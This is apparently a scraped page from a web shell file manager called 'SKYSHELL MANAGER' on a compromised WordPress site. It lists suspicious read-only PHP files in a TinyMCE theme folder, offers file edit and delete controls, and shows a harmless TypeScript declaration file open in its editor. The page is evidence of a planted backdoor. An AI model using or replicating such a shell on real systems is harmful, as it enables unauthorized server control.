📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: places.d.ts
export declare const cachePath: string; interface PlaceOptions { version: string; nodeVersion: string; platform: string; arch: string; } interface LocalPlaceOptions extends PlaceOptions { from: string; output?: string; } export declare function localPlace({ from, output, version, nodeVersion, platform, arch, }: LocalPlaceOptions): string; export interface Remote { tag: string; name: string; } export declare function remotePlace({ version, nodeVersion, platform, arch, }: PlaceOptions): Remote; export {}; //# sourceMappingURL=places.d.ts.map
Save